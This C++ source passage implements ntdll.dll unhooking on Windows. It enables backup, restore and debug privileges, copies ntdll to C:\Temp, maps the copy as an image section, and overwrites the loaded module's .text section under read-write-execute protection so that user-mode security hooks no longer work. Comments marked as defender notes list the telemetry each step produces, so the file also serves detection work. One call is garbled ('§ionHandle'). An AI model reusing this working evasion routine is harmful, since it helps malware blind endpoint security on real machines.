//---------------------------------------------------------------------
// Enable SE_BACKUP_NAME and SE_RESTORE_NAME on the calling process token.
// Relies on EnablePrivilege(), defined elsewhere in this file. Returns TRUE
// only when both calls succeed; because of the short-circuit &&, the restore
// privilege is not attempted if the backup privilege fails.
// Defender note: a non-backup process enabling these two privileges together
// is itself a useful signal, independent of what the code does next.
BOOL EnableBackupAndRestorePrivileges() {
    return EnablePrivilege(SE_BACKUP_NAME) && EnablePrivilege(SE_RESTORE_NAME);
}
//---------------------------------------------------------------------
// Ensure a local copy of ntdll.dll exists at C:\Temp\ntdll_copy.dll.
// Returns TRUE if the copy already exists or was created, FALSE if CopyFileW
// fails. The return value of EnableBackupAndRestorePrivileges() and of
// CreateDirectoryW() are not checked, so the copy is attempted regardless.
// Defender note: the observable artifact is a file in a user-writable
// directory whose bytes match %SystemRoot%\System32\ntdll.dll under a
// different name; file-creation telemetry on C:\Temp catches it, and an
// existing copy is reused without any check that it is still current.
BOOL EnsureLocalNtdllCopy() {
    EnableBackupAndRestorePrivileges();
    LPCWSTR src = L"C:\\Windows\\System32\\ntdll.dll";
    LPCWSTR dst = L"C:\\Temp\\ntdll_copy.dll";
    // Result ignored: failure here surfaces later as a CopyFileW error.
    CreateDirectoryW(L"C:\\Temp", nullptr);
    if (PathFileExistsW(dst)) {
        wprintf(L"[*] Local copy exists: %s\n", dst);
        return TRUE;
    }
    wprintf(L"[*] Copying %s to %s\n", src, dst);
    // bFailIfExists is FALSE, but the PathFileExistsW check above means this
    // call is only reached when no file is present.
    if (!CopyFileW(src, dst, FALSE)) {
        wprintf(L"[-] CopyFileW failed. Error=0x%X\n", GetLastError());
        return FALSE;
    }
    wprintf(L"[+] Local copy created: %s\n", dst);
    return TRUE;
}
//---------------------------------------------------------------------
// Unhook ntdll.dll by mapping a clean copy and replacing the .text section.
//
// Sequence as written: enable SeDebugPrivilege, obtain the on-disk copy,
// resolve five Nt* exports from the already-loaded ntdll, open the copy,
// create a SEC_IMAGE section over it, map the section read-only, locate the
// loaded ntdll's .text section header, make that range PAGE_EXECUTE_READWRITE,
// overwrite it from the mapped copy, restore the old protection, then unmap
// and close. There is no return value; failures are reported via wprintf.
//
// Defender note: every step below produces host telemetry. The ones EDR and
// kernel-callback-based sensors key on are (a) NtCreateSection with SEC_IMAGE
// over a file outside System32, (b) a protection change to
// PAGE_EXECUTE_READWRITE on a range inside ntdll.dll's mapped image, and
// (c) a write to ntdll's code pages from the process's own user-mode code.
// Image-load and section-map events also record the backing file path
// (\??\C:\Temp\ntdll_copy.dll), which is itself anomalous for an ntdll image.
void UnhookNtdll() {
    wprintf(L"[*] UnhookNtdll entered.\n");
    // Result not checked; nothing below depends on SeDebugPrivilege succeeding.
    EnablePrivilege(SE_DEBUG_NAME);
    if (!EnsureLocalNtdllCopy()) {
        wprintf(L"[-] Local ntdll copy unavailable.\n");
        return;
    }
    HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll");
    if (!hNtdll) {
        wprintf(L"[-] GetModuleHandleW(ntdll.dll) failed.\n");
        return;
    }
    // The Nt* entry points are resolved from the loaded ntdll, i.e. the same
    // module whose .text is about to be replaced. If that module carries
    // inline hooks, these calls go through them (so a user-mode sensor still
    // sees the section-create, map and protect calls before the overwrite).
    // The *Func typedefs are declared elsewhere in this file.
    auto NtOpenFile = (NtOpenFileFunc)GetProcAddress(hNtdll, "NtOpenFile");
    auto NtCreateSection = (NtCreateSectionFunc)GetProcAddress(hNtdll, "NtCreateSection");
    auto NtMapViewOfSection = (NtMapViewOfSectionFunc)GetProcAddress(hNtdll, "NtMapViewOfSection");
    auto NtProtectVM = (NtProtectVirtualMemoryFunc)GetProcAddress(hNtdll, "NtProtectVirtualMemory");
    auto NtUnmapView = (NtUnmapViewOfSectionFunc)GetProcAddress(hNtdll, "NtUnmapViewOfSection");
    if (!NtOpenFile || !NtCreateSection || !NtMapViewOfSection || !NtProtectVM || !NtUnmapView) {
        wprintf(L"[-] Failed to resolve required NT functions.\n");
        return;
    }
    // NT-native path form of the copy created by EnsureLocalNtdllCopy().
    // The explicit terminator is redundant for this literal (far shorter than
    // MAX_PATH) but harmless.
    WCHAR localPath[MAX_PATH] = L"\\??\\C:\\Temp\\ntdll_copy.dll";
    localPath[MAX_PATH - 1] = L'\0';
    UNICODE_STRING uStr;
    RtlInitUnicodeString(&uStr, localPath);
    OBJECT_ATTRIBUTES objAttr;
    InitializeObjectAttributes(&objAttr, &uStr, OBJ_CASE_INSENSITIVE, nullptr, nullptr);
    IO_STATUS_BLOCK iosb;
    HANDLE fileHandle = INVALID_HANDLE_VALUE;
    // Read-only open of the on-disk copy; this is an ordinary file-open event
    // against a non-system path.
    if (!NT_SUCCESS(NtOpenFile(&fileHandle, FILE_GENERIC_READ, &objAttr, &iosb, FILE_SHARE_READ, FILE_NON_DIRECTORY_FILE))) {
        wprintf(L"[-] NtOpenFile failed.\n");
        return;
    }
    HANDLE sectionHandle = nullptr;
    LARGE_INTEGER maxSize = { 0 };
    // SEC_IMAGE asks the memory manager to lay the file out as a PE image, so
    // the view below is organised by section RVA like the loaded module.
    // Defender note: an image section over a file outside System32 whose
    // content is ntdll.dll is the strongest single indicator in this routine.
    if (!NT_SUCCESS(NtCreateSection(§ionHandle, SECTION_MAP_READ, nullptr, &maxSize, PAGE_READONLY, SEC_IMAGE, fileHandle))) {
        wprintf(L"[-] NtCreateSection failed.\n");
        NtClose(fileHandle);
        return;
    }
    PVOID mappingAddr = nullptr;
    SIZE_T viewSize = 0;
    // Map the whole section (viewSize 0) read-only into this process.
    if (!NT_SUCCESS(NtMapViewOfSection(sectionHandle, GetCurrentProcess(), &mappingAddr, 0, 0, nullptr, &viewSize, ViewUnmap, 0, PAGE_READONLY))) {
        wprintf(L"[-] NtMapViewOfSection failed.\n");
        NtClose(sectionHandle);
        NtClose(fileHandle);
        return;
    }
    MODULEINFO mi = { 0 };
    // Base address of the ntdll image that is actually in use by this process.
    if (!GetModuleInformation(GetCurrentProcess(), hNtdll, &mi, sizeof(mi))) {
        wprintf(L"[-] GetModuleInformation failed.\n");
        NtUnmapView(GetCurrentProcess(), mappingAddr);
        NtClose(sectionHandle);
        NtClose(fileHandle);
        return;
    }
    LPVOID realBase = mi.lpBaseOfDll;
    // Walk the section table of the *loaded* ntdll to find .text. The section
    // headers are read from the live image, not from the mapped copy.
    PIMAGE_DOS_HEADER dos = (PIMAGE_DOS_HEADER)realBase;
    PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)((BYTE*)realBase + dos->e_lfanew);
    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(ntHdr);
    for (WORD i = 0; i < ntHdr->FileHeader.NumberOfSections; i++, section++) {
        // IMAGE_SECTION_HEADER::Name is an 8-byte field; ".text" fits with a
        // terminator, so strcmp is bounded here by the name length.
        if (!strcmp((char*)section->Name, ".text")) {
            PVOID textBase = (PVOID)((BYTE*)realBase + section->VirtualAddress);
            SIZE_T textSize = section->Misc.VirtualSize;
            ULONG oldProtect = 0;
            // textBase/textSize are in/out parameters to NtProtectVirtualMemory
            // and may come back adjusted (presumably page-rounded — confirm
            // against the NT documentation); the same values are reused for the
            // restore call below.
            // Defender note: this is the RWX-on-ntdll transition that memory
            // scanners and VAD/protection-change callbacks flag.
            if (NT_SUCCESS(NtProtectVM(GetCurrentProcess(), &textBase, &textSize, PAGE_EXECUTE_READWRITE, &oldProtect))) {
                // Copy source is the same RVA in the SEC_IMAGE view; the copy
                // length is the header's VirtualSize, not the adjusted textSize.
                memcpy(textBase, (BYTE*)mappingAddr + section->VirtualAddress, section->Misc.VirtualSize);
                NtProtectVM(GetCurrentProcess(), &textBase, &textSize, oldProtect, &oldProtect);
                wprintf(L"[+] Unhooked .text section.\n");
            }
            // Only the first section named .text is considered.
            break;
        }
    }
    NtUnmapView(GetCurrentProcess(), mappingAddr);
    NtClose(sectionHandle);
    NtClose(fileHandle);
    // Printed unconditionally: it also appears when no .text section was found
    // or the protection change failed, so this line alone does not confirm
    // that any bytes were written.
    wprintf(L"[+] ntdll.dll unhooked successfully.\n");
}